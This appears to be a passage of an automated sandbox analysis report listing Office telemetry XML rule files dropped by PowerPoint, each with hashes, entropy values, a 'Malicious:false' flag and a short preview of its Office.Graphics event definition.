                                                                                                                              SHA-512:0C6048B97796D245D3F3CCEF443542162D35FEC58DF51BE7DD94EE548C198CFCE1B4C713EC8FB716EFD9F691EF39F6BFBE8FF9A647B1998442A1F528C3AD360C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170111" V="2" DC="SM" EN="Office.Graphics.FixedDelayLoadFailure" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dbw1y" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U16" I="1" O="true" N="NumRetries">.. <S T="1" F="NumRetries" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="DllName">.. <S T="1" F="DllName" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):609
                                                                                                                              Entropy (8bit):5.050041213245167
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNxxkoCAvQierIXFJiQjFwcXHaSMdL6bNO5AHNUlu:2dUkHAvcr8v56caS7
                                                                                                                              MD5:470599DD8AF00E0C7A988D9A641F61D2
                                                                                                                              SHA1:5B2FE28CF641B09313D54C7A3D79C168FC0FBF3A
                                                                                                                              SHA-256:F58E1773016EE52E485C7839916DF9E3F631BEFE730DF6844EE1313BF0ACFA06
                                                                                                                              SHA-512:DDC3A8D2A0D650D9A22EC3B24F254814C6D51228B5B00CE1A0687783D9FD482507EF2E3B44771000A95541C7CBF234D07E798925A84D39D59BCB58217663A8F0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170112" V="1" DC="SM" EN="Office.Graphics.DidNotFixDelayLoadFailure" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dbw1z" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="W" I="1" O="true" N="DllName">.. <S T="1" F="DllName" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):472
                                                                                                                              Entropy (8bit):5.1494512612021985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mNekh2FJb0c7oCDLChvRCUHperheNlrzVlrE+F/G+Vs9ndtqsVlrT6/Ulz:TMHdSN5bkoCAvQierwzoKEdL6UDNO2su
                                                                                                                              MD5:02F0E8EE06B7B0B21F8BBF4A5E81853B
                                                                                                                              SHA1:E58C6016A7760BBCBA0C65A8C26F12857E9E6B09
                                                                                                                              SHA-256:E5001F4CF1217FB8AD78AFCBCD269496C1E132C93D802E1F8D67C0A76110D290
                                                                                                                              SHA-512:493115249179B77F044AD6805DA8A18CA6E7084DE212343906A7C0F6212774C218BCA5B3476B49A379C0D61B8402577C8458DAC4BF1A48BC3B58CA3E3D81D7B9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170113" V="0" DC="SM" EN="Office.Graphics.GDIError" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cusas" />.. </S>.. <C T="I32" I="0" O="true" N="GdipStatus">.. <S T="1" F="GdipStatus" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="Message">.. <S T="1" F="ULS_Message" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):822
                                                                                                                              Entropy (8bit):5.015492524119104
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNS6koCAvQierdXFJiQjFqRXHaSMaMHfndy9dIb43Mi8nNO5AHNUlu:2dUStHAvcrBv50gdj37
                                                                                                                              MD5:EEC563CA6AB0EF713A010226FAF5417A
                                                                                                                              SHA1:3F12B759EB303F52722462461C8C4D9C44C8479E
                                                                                                                              SHA-256:174FA2BA67C5A46B6838BA9E4D1C3B63386BD57F5773DA67D042CC5CBEBF5658
                                                                                                                              SHA-512:3CB519732D394A6D399F4068130145FE5F7962DF9CF7383E9C6F99F05605FEF78FBE3574B558284FA6B3E0F0AED88CBB82F8C30F08BA7507052965A7364F81E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170114" V="1" DC="SM" EN="Office.Graphics.RemoveObserver" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cs84o" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="ThreadID">.. <S T="1" F="threadID" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="IBlobObserver">.. <S T="1" F="IBlobObserver" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="TotalBlobsBeingObserved">.. <S T="1" F="totalBlobsBeingObserved" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):593
                                                                                                                              Entropy (8bit):5.117813499836631
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNzMg4pkoCAvQiDA520OXHaSMdXUddy9McScoNO2su:2dUwniHAvRA5XOaE/4pA
                                                                                                                              MD5:A694236DB55D9549EC3ACF545040A006
                                                                                                                              SHA1:E6E744F28D00DF2A43E5EB38499A418FC57B9133
                                                                                                                              SHA-256:36FDE83F3E78D51CFEE4AC76E4F48ED06AAE296B1254F1F6F2632D6A2DE32109
                                                                                                                              SHA-512:18A3BD557F14BE93A0DDACDADC96FD1B6EF93E4F3AD36EC681C5C7206D1D2CC8AA5DF9C273E513570A49B0ED644F5BCC30C9C473DE10EE359D908DCE2BF118EC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170115" V="1" DC="SM" EN="Office.Graphics.ARCFailureDetails" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="ARCExceptions" S="Assert Unexpected Monitorable" />.. </S>.. <C T="U32" I="0" O="false" N="ErrorCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="W" I="1" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="2" O="true" N="HResult">.. <S T="1" F="HRESULT" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):383
                                                                                                                              Entropy (8bit):5.232831662269484
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mN1Dkd+4MwwYb0c7oCDLChvRCUHperhdCdxVe/EpnyNOn2sby:TMHdSN1p4MkoCAvQierHAq/EANO2su
                                                                                                                              MD5:58275387F4B467C834F9443956392F7E
                                                                                                                              SHA1:0F3B75617955371E8269FE63108898C57B298570
                                                                                                                              SHA-256:11FA615DB937714766E1485EA6A921DBC11AE4260461DFBC5B184021501234B9
                                                                                                                              SHA-512:4A27C832FB57342876BCE4EE0AA993D2BC7D012E1355EE3521505A4E0FF032B34A335906B188DDBEE2708BF1F7763157035D57F3443AA1254EF32040D515B486
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170116" V="0" DC="SM" EN="Office.Graphics.GeometryValidationFailure" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ddr1p" />.. </S>.. <C T="W" I="0" O="false" N="Exception">.. <S T="1" F="Exception" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):608
                                                                                                                              Entropy (8bit):5.023617146178391
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSN83HpkoCAvQierHlNXFJiQjFwcXHaSMarfI1NO5AHNUlu:2dU8SHAvcrHlxv56cF87
                                                                                                                              MD5:4352EFE0DB7721C6C191C76C0920CDE7
                                                                                                                              SHA1:D32038F97B403475D1D9B898930FC7E36D7C6A3B
                                                                                                                              SHA-256:F4F0E0AD129792934859777C7680745432B20EFFE69171D94E44477C168E75E1
                                                                                                                              SHA-512:D9DA9BE428E263BE0BE0371789EDA4F835AD2A2F0A8138885817C9DA779DE9ADE1DB2823498E60394AEBBECEA3159C4BC593109ACE8448C0CC431D4D00446CE5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170117" V="0" DC="SM" EN="Office.Graphics.NonInkingInputType" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="92g1p" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="InputType">.. <S T="1" F="InputType" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):615
                                                                                                                              Entropy (8bit):5.0378639054893295
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNp/HpkoCAvQierBXFJiQjFwcXHaSMarfI1NO5AHNUlu:2dUp6HAvcrNv56cF87
                                                                                                                              MD5:1D65CC384A2EA63DCD6EB3C779A31BF7
                                                                                                                              SHA1:A3B3D1526C417BAF4A0C96A82C683BB4D26FCD9A
                                                                                                                              SHA-256:561E23F9BB868AA17C4BD158F770A6CDD3C8D5D63EF11EA745AFEA1162042829
                                                                                                                              SHA-512:834DFEC3D8C33F230B08D030609CE00E556EDD804F0228F5E98F7943194D33E2EDD557BAAD8250A7DF681867A853C8A1066022FF3DA1C9DCA048927115415C92
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170118" V="1" DC="SM" EN="Office.Graphics.InkingInputType" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="92gxn" A="9j45m" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="InputType">.. <S T="1" F="InputType" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):533
                                                                                                                              Entropy (8bit):5.041553102711772
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSYeXIkoCAvQierOOXFJnqRXHaSMCf5xNO/HNUlu:2d3wHAvcrOevmfRS7
                                                                                                                              MD5:F18EA73E631A8720075589FCF209A986
                                                                                                                              SHA1:FAE1367ED41D45D8E00EB3AEFA9DFD2EA0A5F786
                                                                                                                              SHA-256:F7F6E275D7BC14E3D2E089B37904313F99B2A06E0DE60B4C2038ED43BEF74FC5
                                                                                                                              SHA-512:3A91D28E9F0F6F168D251A149F2FF55BDA759E6178AEC9E1EAA1F112FCC904A2BDE9D68DDE18A2AA3A8CFA4D7E60CCD54EFFDD9AB98792221FCE9D5D1F69EF0D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170127" V="0" DC="SM" EN="Office.Graphics.InkGestureFailed" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9ux3n" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="SRType">.. <S T="1" F="SRType" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):584
                                                                                                                              Entropy (8bit):5.089351679566497
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSaOCkoCAvQqAQier9fXFJnqRXHaSMawEuiENO/HNUlu:2dFOlHAvfr9vvmCEdz7
                                                                                                                              MD5:15A7DDB39B68666EAADAA4E9DC0EDD89
                                                                                                                              SHA1:FD2BF6D828300D3AFCBB20779D3AB0FE10597CBD
                                                                                                                              SHA-256:7391916039C847A755B5B58E9AEE350EE159C42656DCF4E4DDAD9DFDA1AE69E8
                                                                                                                              SHA-512:41ECE7F2CB2E3F3A874DB894C8FA344945803A3ECEBB3AD0F15BD4C2A58AC65AEED7632DDB72B26DD98330EB3C96B25648BF4591B18EABE96EE31863B7773F53
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170129" V="0" DC="SM" EN="Office.Graphics.IntelServiceTimeout" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="co05t" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="TriggerCode">.. <S T="1" F="TriggerCode" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):564
                                                                                                                              Entropy (8bit):5.0528345816430535
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSPqepkoCAvQierGXFJnqRXHaSMaG+/fbOg8NO/HNUlu:2d8UHAvcr2vmDTHb7
                                                                                                                              MD5:019D609CC143EFF5F3DDF5331D6B84D9
                                                                                                                              SHA1:EDE827DD60E75B1D4E626F3BF24E177EFE61F716
                                                                                                                              SHA-256:63AE59D45FEAFF09E64FF0631516D7E7F901FDE745F61F493CC4847ACC455052
                                                                                                                              SHA-512:A18B2A6004BAB7CAEC4A8E0F2EA964FE4AB15E1333B5F49714B98C00D3E8FB79835B95374D800F2FFB53193EF8F130C921FC4FBAC4C990E8330855EABC587E52
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170130" V="0" DC="SM" EN="Office.Graphics.PenToolType" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="84n7u" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="CurrentPenToolType">.. <S T="1" F="Current Pen ToolType" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):464
                                                                                                                              Entropy (8bit):5.121640629689538
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSpB7koCAvQiermZXFJnV9nXHaSMNO/HNUlu:2dy4HAvcrYvbp7
                                                                                                                              MD5:94FFE94F09ABDFE69FCEF92B3329120E
                                                                                                                              SHA1:328BB8D7CB96F30D531801018984B83C235980BC
                                                                                                                              SHA-256:8AD1D8198F897BCAD27ED8295CA2314C1B52F1ADA9E70AA593C7DBDF0B727E6A
                                                                                                                              SHA-512:D802460807E9F3FEF4E323319D1962DB1A8AD3095AD33CB8505E042B92CE28CB18E6F52491B3674F2FA25AF741DC994E02F0C7C286F1BCF6D36030BF57BCCA63
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170133" V="0" DC="SM" EN="Office.Graphics.Win32OnlineVideoPlayback" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c5z9m" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="PlayCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):454
                                                                                                                              Entropy (8bit):5.068829243379877
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSqj0koCAvQier8XFJnV9nXHaSMNO/HNUlu:2d77HAvcrIvbp7
                                                                                                                              MD5:5F3A7913BC72F19D173A71E8CC271459
                                                                                                                              SHA1:203FF5B2E938FC67F719E70E5D1E3344AEC49501
                                                                                                                              SHA-256:263255C83D2AB3795331DC610909CD6B80BD1AD96DEC480386CF18E91EA941D6
                                                                                                                              SHA-512:8BC605CCD50D6BDEEB2654A4BF724987C7FF3BCAE14168AFF200947DC5277C382C32D7A5C7AE3CBD199ADCD24F10E1BF911C4F4BD614E6A28CE9497F5DEF5FA2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170134" V="0" DC="SM" EN="Office.Graphics.InsertSmartArt" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhlc7" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="PlayCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):653
                                                                                                                              Entropy (8bit):5.040958428955208
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSaKWI1okoCAvQierMJXFJn/XHaSMIIupPNQ9PINO/HNUlu:2daWIVHAvcrM1v/tQ7
                                                                                                                              MD5:C0A4764642FDB4A2D49787DBC1D3F2BF
                                                                                                                              SHA1:61B1D81AF3C212EF84B69EA4FC37B71E42875387
                                                                                                                              SHA-256:C63917C35F1B221AF24D73F3A3BC7ACEB2B7094BF9F692BB23427E01FD9DA551
                                                                                                                              SHA-512:3458CA87B1BA994467977A201D89CF48E9609FE1FFD345801A132A15E11AB25322ED5EA1672D0C3100C0828D7D8C8417211E41745F689203E0B283D587569AA1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170135" V="4" DC="SM" EN="Office.Graphics.AltTextFeedbackUIClick" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="5czg2" A="545u8" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="ClickCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="Id">.. <S T="1" F="Id" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="QuerySource">.. <S T="1" F="QuerySource" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):662
                                                                                                                              Entropy (8bit):5.072618292926917
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSJ5KZDkoCAvQieraXFJn/XHaSM+cDmpPNQ9PINO/HNUlu:2dqtHAvcrSv/NAiQ7
                                                                                                                              MD5:370C8282B3F134BA2AD89C7C79582041
                                                                                                                              SHA1:F231A0E23C73CAE0E6ABA2EC7C525768E0949112
                                                                                                                              SHA-256:64448833054C66D7FCBB009F8887E3CD318816043BAB85186E77E53DB702AF5D
                                                                                                                              SHA-512:3C07D2DA06B58CE813177505E0E42C90F52B19684AD7A7B18A5FFEFCF8B5D846CE0EA2A2C95A561AA1D1AF4090F049DD40063059BC70E92E86AE836785CE95FF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170136" V="3" DC="SM" EN="Office.Graphics.AltTextBarClick" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="5czg4" A="545va" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="ClickCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="FirstClick">.. <S T="1" F="FirstClick" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="QuerySource">.. <S T="1" F="QuerySource" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):559
                                                                                                                              Entropy (8bit):5.085893402940255
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS4ZkoCAvQierrXFJnqRXHaSMnd/9aNO/HNUlu:2daHAvcrjvmsl57
                                                                                                                              MD5:C4135EFB841BF65B71DA076B7FE6F994
                                                                                                                              SHA1:F892F312C3DED0D2D7B58EB218188D523A0DD7D3
                                                                                                                              SHA-256:E015483A9A37E55C83F6CCCE1F1E90BA2B6EC5D35083C55C49A9E4DFB0DEA282
                                                                                                                              SHA-512:30E5DF6618AAB8D4BC23C69285CB8FBD3F65D522EEEEC88D61DAE4D735CF0C032A26EC1BEC038876EAD99015894B384E32069674F2BA5A163EF3E473BDC5BC41
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170137" V="0" DC="SM" EN="Office.Graphics.DelayCanvasInkInput" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b6vhm" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="B" I="1" O="false" N="DelayCreation">.. <S T="1" F="DelayCreation" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):465
                                                                                                                              Entropy (8bit):5.114277201077218
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSsTcIkoCAvQierzXFJnqRXHaSMNO/HNUlu:2dnTeHAvcrLvmp7
                                                                                                                              MD5:DE22369294116CAFC3BAA1FBB940BF46
                                                                                                                              SHA1:33D7B8581040A9D0E60C33E79F9FFD3C2647E276
                                                                                                                              SHA-256:70FC29FC335C8CB472B4F1AEE5D354529DDA9E866657043DF29DA5204D98E999
                                                                                                                              SHA-512:D55E890D684BDC93A47692CC595746C201CCC5D9BB114F8146AF8840671D7C3F45674F43F2A6CD5D7D66D0FB62A066F2B4827E06D0E9B10EF7B41A2429353547
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170138" V="0" DC="SM" EN="Office.Graphics.OnlineVideoAuthInfoMissing" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="6ra28" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):467
                                                                                                                              Entropy (8bit):5.1236575579002785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSOfIkoCAvQierVXFJnqRXHaSMNO/HNUlu:2djXHAvcr5vmp7
                                                                                                                              MD5:ED83698C5C5F1E655EB67F06388223AA
                                                                                                                              SHA1:84EE40D6C01C3C72C737D6F02E6E4E89532D6174
                                                                                                                              SHA-256:F7EFEAA740D5902ECAF3592C4E3F9FEC60537042BECF4616543AC46F90CB724C
                                                                                                                              SHA-512:1F618B37A26D3407B25CC43E00456AD58445461B9D96687357B6DD5F831CABD9A16FC935943AFDBDDF3CD6C14B2D7A7307B2AD8A18854873A59C862EE5766E8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170139" V="0" DC="SM" EN="Office.Graphics.OnlineVideoAuthTicketMissing" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="6ra26" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
